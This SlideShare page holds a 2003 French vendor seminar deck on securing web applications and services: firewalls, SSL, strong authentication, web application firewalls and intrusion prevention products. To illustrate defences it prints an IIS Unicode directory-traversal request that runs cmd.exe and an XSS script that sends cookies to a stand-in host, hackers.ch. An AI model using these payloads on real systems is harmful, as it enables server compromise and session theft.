SlideShare ist ein Scribd-Unternehmen logo

Sécurité des applications Web

Als PPTX, PDF herunterladen
Sylvain Maret
Sylvain Maret

Séminaire 2003. Technologies pour la protection des applications et services web. Web Application Firewall

Technologie
1 von 99
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 La sécurité des services Web votre firewall, votre meilleur ennemi Mardi 11 mars 2003 Avec la participation de RSA Security Sylvain Maret / CTO e-Xpert Solutions  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 e-Xpert Solutions: motivations stratégiques…  e-Xpert Solutions SA, c’est deux ans d’activité mais aussi…  Des convictions techniques  La sécurité informatique nécessite des experts dédiés  Complémentarité de la sécurité classique et des dernières technologies  Primauté de la veille technologique (vague avant-gardiste)  Une compréhension des évolutions de la sécurité informatique (l’expérience…)  Une philosophie de prestation de qualité  Discrétion et traitement confidentiel des données de notre clientèle  Rigueur et sérieux  Importance du suivi opérationnel  Une adéquation entre des solutions, des besoins et des moyens à disposition  Dans la pratique…  Des implémentations rigoureuses (études avant-projets, planification, mesure de recettes)  Des services de maintenances réactives & préventives  Des formations sur mesure (sensibilisation, suivi opérationnel, etc.)  Des Cursus réguliers (UniGe, HES Genève & Yverdon)  Solutions à la clef
 Les solutions e-Xpert Solutions  Solutions de sécurité ―classiques‖  L’accès: Firewalls, Proxy, Reverse Proxy SSL, authentification forte  Les communications: VPN, Proxy , IDS, contenu Web, messagerie sécurisée, analyse des URLs  Les systèmes: sécurité des OS, IDS-FIA, Antivirus  Solutions de sécurité de ―pointes‖  L’accès: Firewalls applicatifs, gestion des identités, PKI (OSCP), Biométrie  Les communications: PKI, Signature électronique, S/MIME  Les systèmes: PKI, HSM, Chiffrement (Key Recovery), IPS  L’architecture et les applications  Design réseau  Haute disponibilité  Autorisation et privilèges d’accès  Et ce qui suit…  Solutions à la clef
 Le but du séminaire…  Nécessité mais insuffisance des outils de sécurité classiques  Cf. SQL Slammer, Nimda (IIS), Slapper (SSL), Opaserv (WINS), Bugbear (SMTP/Netbios)  Où sont les menaces et les ―challenges‖ à l’heure actuelle  Protéger les applications – en particulier les services Web  Solutions à la clef
 Agenda  9h40 La sécurité des services Web I  Sylvain Maret – e-Xpert Solutions SA  10h00 RSA Security Mobile et Clear Trust  Hervé Ottet – RSA Security  10h20 Pause de 20 minutes  10h40 La sécurité des services Web II  Sylvain Maret – e-Xpert Solutions SA  11h00 Présentation et démonstration Entercept  Christian Berclaz – e-Xpert Solutions SA  11h20 Questions & réponses  11h30 Showroom et buffet  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 La sécurité des services Web votre firewall, votre meilleur ennemi La sécurité « Classique » (Partie I) par Sylvain Maret 11 mars 2003  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Définition: application Web  Application utilisant le protocole HTTP (80) ou HTTPS (443) pour être pilotée par un utilisateur  L’utilisateur a besoin d’un simple navigateur Web ou d’une application propriétaire utilisant le protocole HTTP/HTTPS pour travailler sur l’applicatif  Exemple: OWA, eBanking, Hotmail, votre portail, etc.  Solutions à la clef
 Définition: services Web  Composant offrant un ou plusieurs services métiers publiés sur un réseau (Internet)  Traduction du moteur Google  Réservation d’un Hôtel  Base de données, etc.  Utilise des technologies telles que:  Soap, XML, WSDL, UDDI, etc.  Technologie émergente  Même problème de sécurité  Solutions à la clef
 Architecture d’une application Web Serveur Web App. Web DB Application Server XML HTTP / HTTPS Apache RMI Port 80 / 443 IIS SQL IIOP Iplanet XML XML Zeus JDBC XML, Soap, HTML, Soap Etc. etc. etc. etc. CGI, PHP Etc. App. Web DB Client Web Firewall Classique  Solutions à la clef
 Risques acceptables ?  La sécurité « classique »  La sécurisation du périmètre et des systèmes  La sécurité de « pointe »  La sécurisation des applications Web  La gestion des identités  Firewall applicatifs Web  Analyse comportementale  Solutions à la clef
 Les éléments de la sécurité « classique »  Segmentation - Firewall  Sécurisation des communications SSL  Blindage des systèmes d’exploitations  Détection d’intrusions  Blindage des serveurs Web  Reverse Proxy – Haute Disponibilité  Authentification forte  SecurID et RSA Mobile  Certificats Numériques  Solutions à la clef
 Segmentation - Firewall Liaison Physique ICMP IP Autres UDP protocoles DNS Etc. TCP http https Autres protocoles smtp Etc.  Solutions à la clef
 Segmentation - Firewall X TCP pop3 http https ftp X Serveur Web  Solutions à la clef
 Segmentation - Firewall DMZ Réseau Interne SMTP SMTP X X Mail Server Mail Server (Lotus, Exchange) SQL HTTP SOAP Back Office Application Web SAP, Oracle, etc.  Solutions à la clef
 Sécurisation des communications: SSL  Sécurisation du transport entre le client et le serveur  Technologie VPN embarquée dans les clients Web  Services de sécurité  Confidentialité (par exemple un chiffrement à 128 bits)  Intégrité des données  Authentification du serveur  Option: authentification du client  Utilisation de la technologie PKI  Certificat numérique pour le serveur  Solutions à la clef
 SSL: authentification du serveur Root CA publique Certificat du site http://largo.e-xpertsolutions.com SSL 128 bit Vérification Du certificat  Solutions à la clef
 Sécurisation de vos transactions SSL: un module HSM HSM Ncipher  Protège les clés privées d’une FIPS-140 intrusion  Sécurise les transactions SSL  Calcul cryptographique dans le module  Support PKCS#11  Apache, IIS, IPlanet, etc e-Xpert Gate SSL  Solutions à la clef
 Augmentation de la puissance SSL jusqu’a 800 transactions par seconde  Solutions à la clef
 Haute disponibilité, partage de charge http / https Application Web http F5 Big IP Application Web HTTP / HTTPS http Répartition de charge http Gestion des sessions Application Web Haute disponibilité Facilité à la maintenance des systèmes Terminaison SSL Possible  Solutions à la clef
 Blindage des systèmes d’exploitation: risque minimum  Restriction des services  Sécurisation du « stack » IP  Déni de services, opacité de « l’emprunte »  Mise en place des règles du firewall local  Gestion des droits sur les fichiers  Gestion sécurisée  SSH, Remote Control sécurisé  Authentification forte pour la gestion  Détection des tentatives d’intrusions  Mécanismes d’alertes (Snmp. Syslog, etc.)  Politique d’application des « Patchs » de sécurité  Solutions à la clef
 Système de détection d’intrusions: Host IDS (FIA)  Permet de déceler une tentative d’intrusion sur une application Web et son système d’exploitation  Il s’agit d’une technologie de détection d’intrusions  File Integrity Assesment  Basé sur l’utilisation de la cryptographie moderne  Méthode de « Hashing » (Sha1, md4, etc.)  Méthode de signature numérique (RSA, El Gamal)  Au 1er changement, l’éventuelle intrusion est signalée  Solutions à la clef
 Détection d’intrusion avec Tripwire Alerte intrusion « Defacement B » Console de gestion TRIPWIRE T W B T W A  Solutions à la clef
 Sécurisation des serveurs Web: la sécurité accrue  Sécurisation du serveur IIS Microsoft  Suppression des composants inutiles (ISA-API)  Suppression de la bannière  Application des patchs  Application d’une politique de sécurité e-Xpert Solutions  Outils Microsoft (IIS Lock)  Sécurisation du serveur Apache  Suppression des modules inutiles  Suppression de la bannière  Application des patchs  Configuration en mode « Jail » pour un blindage optimale  Solutions à la clef
 L’importance de l’opacité du serveur  Prévenir l’intrusion  Demande plus de temps d’analyse avant une tentative d’attaque  Difficulté de trouver des exploits pour un serveur Web spécifique  Pour leurrer les robots  Script Kiddies  Pour éviter certains Vers Mauvais exemple ! (* Slammer 2002 )  Solutions à la clef
 Clé de voûte de la sécurité: l’authentification forte QQ que l’on possède QQ que l’on connaît + + QQ que l’on est H34ff34QF PIN Code  Solutions à la clef
 Pourquoi l’authentification forte ?  Vol de mot de passe sur le réseau  Majorité des protocoles n’est pas chiffrée  Renifleurs spécialisés pour les script kiddies (Gestion des attaques de type ARP)  MiM attack SSL  Ecoute des touches du clavier  Key Logger, Troyan, Back Door, Code mobile, etc,  Attaques par « brute force » ou dictionnaire  Valable pour les applications sans mécanisme de protection  Social Engineering  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration par la pratique SSL Hijacking  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Vol d’un mot de passe d’une session SSL (SSL Hijacking) 1) ARP Spoofé 172.20.1.14 DNS Spoofé Serveur DNS 2) DNS Spoofé IP de Fantasio? 172.20.1.14 172.20.1.253 Spoof la Trafic SSL déchiffré Fantasio Serveur Web réponse 172.20.1.253 3 bis) Certificat du serveur Fantasio Spoofé 3) SSL Interrompu  Solutions à la clef
La simplicité et la sécurité sans compromis: le certificat client  SSL Autorité de certification Internet ou externe Token USB Validation des certificats Smarcard PKCS#12 CRL OCSP VSCP Challenge (nonce) + Réponse  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Etude de cas MKS Finance Application bancaire / certificats clients SSL  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Etude de cas: sécurisation d’une application bancaire  Authentification forte basée sur les certificats clients  Utilisation d’un reverse proxy SSL  E-Xpert Gate (PKI Ready: OCSP, filtrage des certificats,etc.)  Application basée sur une architecture J2EE  Environ 300 clients  Génération des certificats clients « In House »  Sécurité accrue et optimisation des coûts  Distribution des certificats dans leur container software  PKCS#11  Evolution possible vers la signature des transactions  Non-répudiation  Solutions à la clef
 Architecture de sécurité basée sur la solution e-Xpert Gate Domino Server Web BEA BEA WebLogic e-Xpert Gate Applet Java Container PKI Ready HTTPS HTTP Reverse Proxy PKCS#12 Authentification SSL Validation des certificats CA et VA OS Sécurisé SSH RA Support PKCS#11 etc. Validation Online Certificat délivré DB des Certificats par la PKI interne Via OCSP Cobol  Solutions à la clef
 La référence: l’authentification forte SecurID  Solution très portable  Pas besoin d’installer du hardware  Convient parfaitement aux nomades (Internet Café, Hôtel)  Niveau de sécurité très élevé  Système simple à l’utilisation  Pas de clavier  De facto Standard  Environ 300 agents SecurID  Agents pour les applications Web  Solutions à la clef
 Identification forte des utilisateurs Web avec SecurID  Serveurs Web  IIS  Apache et reverse proxy  Stronghold  SUN One Server  Domino  Application server  BEA WebLogic, IBM WebSphere  Via Cleartrust  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Etude de cas NFuse Citrix et SecurID  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Etude de cas: sécurisation de Citrix NFuse avec RSA SecurID Ace Server SecurID Citrix Web Server Nfuse Secure Gateway  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Le système d’authentification mobile La gestion des identités Par Hervé Ottet, RSA Security La sécurité de « pointe »  info@e-xpertsolutions.com | www.e-xpertsolutions.com
RSA Mobile and RSA ClearTrust La Sécurité des services Web, 11 Mars 2003 Hervé Ottet, Pre-Sale Engineer, hottet@rsasecurity.com
Why Focus on Authentication? • Authentication is the essential foundation for trusted business process — Establishes trust by proving identities of the participants in a transaction • Authentication is the foundation for other critical services — Personalization — Authorization / Access Management — Identity Management Business policy: liability, assurance for transactions Applications and services: access control and authorization — Audit Presentation / Personalization: what the user sees Authenticated Identity (user, device, application, group, organization) Defining relationships through quality of experience Relationships between identities and information Relationships between people, groups, and organizations
RSA Mobile
Introducing RSA Mobile • Upon receiving a valid username and PIN, RSA Mobile sends a one-time access code to the user's portable device. • Two-factor authentication for Web Application • Leverages a device the user already has • Zero-deployment, zero-footprint • Intuitive, easy to use and highly portable
How RSA Mobile works Web Server Agent Userid + PIN Userid + PIN Start here RSA Mobile Authentication Userid + PIN Server Access code + Phone # Access code 294836 e-Mail Server or Gateway Server Telco Network Access code Access code 294836 294836 Text Message
User Authentication (IV)
RSA Mobile: Security • Built on RSA Security’s patented time-synchronous methodology — Proven security — 13 million end users • In the GSM Network, the access code is sent encrypted with A5 • Access code must be entered on the same instance of the Web browser from which the code was requested — Prevents the use of intercepted access codes • User account can be automatically disabled after an administrator configurable number of bad PINs or bad access code attempts.
RSA Mobile Key Features • Protects Web resources through admin-defined authentication policies — RSA Mobile or LDAP passwords — RSA SecurID (proxy to RSA ACE/Server) — ―OR‖ combinations of the above • Flexible integration options — Web filters to protect resources (IIS, Apache, ISA, Apache proxy) — Authentication APIs and Administrative APIs — Can configure PIN-less installation (Users enter tokencode only, no PIN) • High performance / availability — Built on BEA WebLogic application server — Support SAML • RSA Mobile plug-ins facilitate easy integration to the Telco infrastructure — Ships with support for • Wireless modem, E-mail, directly to Telco via SMPP — Additional plug-ins can be easily built
WEB Access Management
Market Drivers • Increased need for managing trust and security over the Web (customer, supplier, resellers) • Reduce burdensome and costly user administration • Provide greater ease of use via Web SSO for customers • Reduce complexity of managing security across heterogeneous IT environments • Desire to support different authentication methods • Real-time transactional authorization will be required as more complex e-business services move to the Web
Problem How do you manage the identities of a growing number of users… and their secure access to enterprise Web resources in a scalable, cost- efficient manner …. Customers Partners Employees Access Channels: Intranet, Extranet, Portal, Wireless “Silo” “Silo” “Silo” “Silo” “Silo” Access Access Access Access Access Mgmt. Mgmt. Mgmt. Mgmt. Mgmt. RSA Online SecurCare Siebel PRC mySAP Online
Problem …across a heterogeneous IT infrastructure? Portal Web Content Databases Servers Servers Application Management Directories Servers Enterprise Apps
Solution Customers Partners Employees Access Channels: Intranet, Extranet, Portal, Wireless Web Access Management Solution RSA Online SecurCare Siebel PRC mySAP Online
RSA ClearTrust
RSA Cleartrust Architecture Entitlements Entitlements database directory Entitlements Administration Server console Authorization Load server Balancing & replication Authentication agents Web Web Web … Web Server 3 .. Server 2 Server 1 Server n Encrypted Session Cookie End user
Authorization ―What can you access?‖ • Web server — Resource – identified by Universal Resource Indicator (URI) — Web pages, CGI files, directories, GIF, JPG files etc. — Application – group of resources • Application server — Additional resources - EJBs, JSPs, Java servlets • Method-level protection – ACCESS, GET, POST • Risk mitigation with fine-grained protection of your existing web-based resources
Multiple Authentication Options Offers flexibility and choice • Continue to offer customers broadest choice of authentication methods • Out-of-box support for: — Passwords — RSA SecurID tokens — X.509 certificates Password — Basic (LDAP) — Forms-based authentication • Authentication chaining available via and/or statements • Custom WAX support for: — Biometrics — RSA Mobile — .NET Passport
Smart Rules • Apply access rules based on dynamic user properties • Based on flexible business rules and comparison logic • Decrease time to market and increase security
Flexibility RSA ClearTrust APIs • Administrative API (Java, C, DCOM) — Create/update user accounts and set authorization rules • Runtime API (Java, C, DCOM) — Provide authentication and authorization services for applications not covered by RSA ClearTrust • WebAgent extension (WAX - C only) — Allows extension and customization of existing Web server plug-in • Leverage existing IT investments though effective systems integration
A Comprehensive Solution Identify Manage/ Ensure Ensure Users and Personalize Integrity of Integrity of Devices Access Information Transactions Identity Application Provisioning Integration Mobile Management Services Partners • World-class organization • Largest, fastest growing partner program • Full range of services • Channel partners • Global, 24/7 customer support • Strategic C/SI relationship Information and People and Devices Transactions
www.the-demo-bank.com www.rsasecurity.com
 Pause: 20 minutes  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 La sécurité des services Web Votre firewall, votre meilleur ennemi La sécurité de « pointe » (Partie II) par Sylvain Maret 11 mars 2003  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Pourquoi la sécurité « classique » n’est plus suffisante ?  Les applications Web sont vulnérables  Env. 80% des applications testées (FoundStone)  Les développeurs ne sont pas encore sensibilisés à la sécurité informatique  Encore trop d’erreurs  Les hackers se focalisent sur les applications Web  Votre firewall classique est impuissant pour prévenir les intrusions applicatives  Vos sondes IDS peuvent « éventuellement » détecter une attaque !  Solutions à la clef
 Votre firewall – votre meilleur ennemi http / https XML, Soap, WSDL .NET Java, ActiveX, VBScript, etc. Html, Dhtml * Pour les flux HTTP votre firewall =  Solutions à la clef * Firewall Classique filtrage niveau 3
 Les différentes attaques des applications Web Serveur Web App. Web DB Application Server XML Client Web HTTP / HTTPS Apache RMI Port 80 / 443 IIS SQL IIOP Iplanet XML XML Zeus JDBC XML, Soap, HTML, Soap Etc. etc. etc. etc. CGI, PHP Etc. DB •Cross Site •Vol de session •Interprétation des URLs •Mauvais contrôle •Injection de Scripting •MiM http •Mauvaise configuration des entrées code SQL •Code mobile •MiM SSL •BoF utilisateur •Dénis de •Sniffing •Unicode •Méta caractères service •Direct OS Command •BoF •Etc. •Etc. •Etc.  Solutions à la clef
 Interprétation des URLs http://fantasio.e-xpertsolutions.com:80/chemin/application.asp?a=toto&b=1234 DB Application Server XML HTTP Apache RMI Port 80 IIS SQL IIOP Iplanet XML XML Zeus JDBC XML, Soap, HTML, Soap Etc. etc. etc. etc. CGI, PHP Etc. Serveur Web App. Web DB Client Web Firewall Classique  Solutions à la clef
 Illustration avec IIS Unicode Exploit  Ancienne vulnérabilité du serveur IIS  Exemple pédagogique  Permet d’exécuter des commandes sur le serveur IIS  Utilise les URL malformés pour « passer les commandes »  « Dot Dot »  Unicode  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration par la pratique IIS Unicode Exploit  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Interprétation de commandes par les URLs Fantasio Serveur Web GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir  Solutions à la clef
 Reverse Proxy: firewall applicatif Web  Filtrage des URLs en temps réel  Se base sur une définition précise des URLs  Inclusive  Exclusive 1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 2 GET /scripts/demo/taxes.asp?a=12&b=toto  Solutions à la clef
 e-Xpert Gate: le firewall applicatif Web Filtrage des URL http, https HTTP Apache Mod_Rewrite Application Web Mod_SSl PKI Support SecurID Support Radius Support HSM Mutli Site OS sécurisé GUI via SSL SSH FIA  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration par la pratique e-Xpert Gate: firewall applicatif Web  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 e-Xpert Gate: blocage de l’attaque Unicode http, https HTTP Application Web GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir  Solutions à la clef
 Contrôle des données utilisateurs  La plupart des applications ne contrôlent pas les « Input »  Seulement un contrôle au niveau du client (navigateur) !  Les attaques possibles  Insertion de code, XSS  BoF (pas de contrôle de taille)  exécution de code malicieux  Dépassement des quotas (transaction financière)  Caractères dangereux:  !@$%^&*()-_+`~|[]{};:'quot;?/,.><  Solutions à la clef
 Illustration avec le Cross-Site Scripting (XSS)  Principe de l’attaque  Attaquer les utilisateurs de l’application plutôt que l’application elle-même  L’attaquant peut provoquer l’envoi à la victime par le site Web légitime d’une page hostile contenant des scripts ou des composants malveillants  Cette page est exécutée sur le poste de la victime dans le contexte du site Web d’origine <A HREF=http://www.mabanque.com/<script> alert(‘Malicious code’)</script>quot;>Click Here</a>  Solutions à la clef
 Exemple: vol d’un cookie <script> document.location=‘http://hackers.ch/cgi/cookie?’+document.cookie </script> Envoie du cookie vers le site hackers.ch  Solutions à la clef
 Exemple: Vol de session par XSS Hacker Application Web Login avec le cookie volé 5 4 2 3 1 Lien hostile Application utilisateur Web CGI Script Mail, Page Web Exécution de code hostile  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration par la pratique Attaque XSS  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Attaque XSS Injection code hostile http, https Code Hostile Application Web Code exécuté sur le poste client  Solutions à la clef
 Recommandations: contrôles des données utilisateurs  Accepter que les données autorisées !  Recommandations pour les développeurs  Ne pas faire confiance au client (navigateur)  Comptage du nombre de paramètres  Contrôle du type de données  Contrôle de la longueur  Etc.  Pour plus d’informations  http://www.owasp.org  Solutions à la clef
 La tendance des firewalls applicatifs Web  Mode d’apprentissage automatique  Contrôle des paramètres  Contrôle des attaques de « brute force »  Blocage de XSS  Contrôle des cookies  Architecture  Mode Reverse Proxy  Agent sur le serveur Web  Solutions à la clef
 Les enjeux du futur: les services Web  Nouveaux modèles  Notion de services Web  J2EE - .NET  Contrôle des messages Soap / XML  Nouveaux standards  XML Encryption  XML Signature  Nouveaux types d’outils de sécurité  Firewall XML  PKI  Solutions à la clef
 Audit des applications Web  Outils spécialisés pour auditer les applications Web  Recommandation  Réaliser régulièrement des tests d’intrusions  Plus particulièrement avant la mise en production  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Présentation et démonstration Entercept La sécurité de « pointe » 11 mars 2003  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Entercept: prévention des intrusions  Outil de la famille des « IPS »  Intrusion Prevention System  Détecte et bloque les intrusions  Sécurisation des plates-formes sensibles  Services frontaux - DMZ  Services sensibles internes à l’entreprise  Sécurisation des serveurs Web  Applications Web  Extranet, Intranet  Solutions à la clef
 Objectif du produit  Garantir l’intégrité des systèmes  Stopper les attaques (OS et applications)  Protection des attaques connues et inconnues  « Blinder » la machine  Protection des BoF (60% attaques*)  Faciliter le déploiement et l’administration  Minimiser les ressources IT  Eliminer le « Know How » très spécifique  Produit simple à mettre en oeuvre  Permet une latence dans la mise en œuvre des patchs  Solutions à la clef * Source: CERT 2003
 Entercept: la protection efficace de vos ressources  Blocage des comportements anormaux  Protection contre les BoF  Méthode patentée  Escalade de privilège  Protection des ressources  Fichiers critiques  Fichiers de configuration  Registry (si Windows)  Protection contre l’installation de programmes malicieux  Root Kit  Back Door  Etc.  Solutions à la clef
 Concept des « System Call » Program Program Program A B C fopen System Call unlink Table rndir User Mode Kernel Mode OS Kernel Network Disk Other Driver Driver Drivers  Solutions à la clef
 Concept des « System Call » avec Entercept Program Program Program A B C fopen System Call unlink Table rndir User Mode Kernel Mode OS Kernel Network Disk Other Driver Driver Drivers  Solutions à la clef
 Entercept: firewall applicatif HHTP Serveur Web Décodage http Moteur http FluxHTTP HTTP Prévention des intrusions  Solutions à la clef
 Mode d’apprentissage Warning Protection Vault Mode Mode Mode Increasing Security  Solutions à la clef
 Architecture Entercept Notification Reporting Management Serveur NT Serveur WEB Serveur Unix et 2000  Solutions à la clef
 Gamme de produits  Entercept Standard Edition  Entercept Database Edition  Windows NT  SQL Server 2000  Windows 2000  Solaris 6, 7 et 8  Entercept Web Edition  Apache  Console de gestion Entercept  IIS 4 et 5  NT 4  iPlanet  Windows 2000  Netscape Entreprise Server  Solutions à la clef
 Road Map Entercept 2003  Version 3.0 disponible courant 2003  Modèle 3 tiers  Gestion par rôles des administrateur  Création de signatures d’attaques  Personnalisation des rapports  Nouveaux agents  HPUX 11, Solaris 9, and Apache 2, linux , Aix  Web Services: Soap XML  Serveur de messagerie  Solutions à la clef
 Entercept’s Awards et partenaires stratégiques  Solutions à la clef
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration Back Door  info@e-xpertsolutions.com | www.e-xpertsolutions.com
 Démonstration Entercept Management Entercept You have been Hacked Hacker Script Kidies Intrusion Agent Intercept pour Web  Solutions à la clef
 Conclusion  Malgré les mesures de sécurité « classiques » les applications Web restent vulnérables  Quelles solutions ?  Authentification forte  Gestion des privilèges  Les firewalls applicatifs Web  L’analyse comportementale  Ou ?  La formation des développeurs  Solutions à la clef
 Démonstration Entercept  Solutions à la clef
 Merci pour votre attention  Solutions à la clef
 Sécurisation des services Web: les produits  RSA Security  Entercept  e-Xpert Gate  NCipher  SSH Communications  Appliance IBM  Tripwire  Aladdin  F5 Networks  Solutions à la clef

Empfohlen

Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseAntonio Fontes
 
La sécurité sur le web
La sécurité sur le webLa sécurité sur le web
La sécurité sur le webSofteam agency
 
Durcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebDurcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebCyrille Grandval
 
Introduction vulnérabilité web
Introduction vulnérabilité webIntroduction vulnérabilité web
Introduction vulnérabilité webdavystoffel
 
Failles de sécurité
Failles de sécuritéFailles de sécurité
Failles de sécuritéGuillaume Harry
 
Sécurité des réseaux
Sécurité des réseauxSécurité des réseaux
Sécurité des réseauxSehla Loussaief Zayen
 
Sécurité des Applications WEB -LEVEL1
Sécurité des Applications WEB -LEVEL1 Sécurité des Applications WEB -LEVEL1
Sécurité des Applications WEB -LEVEL1Tarek MOHAMED
 
Les principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesLes principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesXavier Kress
 

Empfohlen

Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseAntonio Fontes
 
La sécurité sur le web
La sécurité sur le webLa sécurité sur le web
La sécurité sur le webSofteam agency
 
Durcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebDurcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebCyrille Grandval
 
Introduction vulnérabilité web
Introduction vulnérabilité webIntroduction vulnérabilité web
Introduction vulnérabilité webdavystoffel
 
Failles de sécurité
Failles de sécuritéFailles de sécurité
Failles de sécuritéGuillaume Harry
 
Sécurité des réseaux
Sécurité des réseauxSécurité des réseaux
Sécurité des réseauxSehla Loussaief Zayen
 
Sécurité des Applications WEB -LEVEL1
Sécurité des Applications WEB -LEVEL1 Sécurité des Applications WEB -LEVEL1
Sécurité des Applications WEB -LEVEL1Tarek MOHAMED
 
Les principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesLes principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesXavier Kress
 
Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Sylvain Maret
 
Introduction à la sécurité informatique Volume2
Introduction à la sécurité informatique Volume2Introduction à la sécurité informatique Volume2
Introduction à la sécurité informatique Volume2Sylvain Maret
 
Presentation des failles_de_securite
Presentation des failles_de_securitePresentation des failles_de_securite
Presentation des failles_de_securiteBorni Dhifi
 
Conférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime MauchausséeConférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime MauchausséeNormandie Web Xperts
 
Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2Sylvain Maret
 
Les principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesLes principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesBee_Ware
 
Securité des applications web
Securité des applications webSecurité des applications web
Securité des applications webMarcel TCHOULEGHEU
 
Présentation Top10 CEGID Lyon
Présentation Top10 CEGID LyonPrésentation Top10 CEGID Lyon
Présentation Top10 CEGID LyonSébastien GIORIA
 
Vulnérabilité des sites web
Vulnérabilité des sites webVulnérabilité des sites web
Vulnérabilité des sites webSaid Sadik
 
Les menaces applicatives
Les menaces applicativesLes menaces applicatives
Les menaces applicativesBee_Ware
 
Sécurité des web services soap
Sécurité des web services soapSécurité des web services soap
Sécurité des web services soapZakaria SMAHI
 
Les 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASPLes 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASPyaboukir
 
Sécurité des applications web
Sécurité des applications webSécurité des applications web
Sécurité des applications webGuillaume Grégoire
 
White paper - La sécurisation des web services
White paper - La sécurisation des web servicesWhite paper - La sécurisation des web services
White paper - La sécurisation des web servicesBee_Ware
 
IDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAUIDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAUCHAOUACHI marwen
 
Introduction a la securité informatique Volume1
Introduction a la securité informatique Volume1Introduction a la securité informatique Volume1
Introduction a la securité informatique Volume1Sylvain Maret
 
Owasp top 10 2010 Resist toulouse
Owasp top 10 2010 Resist toulouseOwasp top 10 2010 Resist toulouse
Owasp top 10 2010 Resist toulouseSébastien GIORIA
 
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan Marcil
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan MarcilASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan Marcil
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan MarcilCyber Security Alliance
 
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...Faouzi Maddouri
 
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...Patrick Leclerc
 
Sophia conf securite microservices - 2017
Sophia conf securite microservices - 2017Sophia conf securite microservices - 2017
Sophia conf securite microservices - 2017SecludIT
 
Les firewalls applicatifs HTTP / WAF
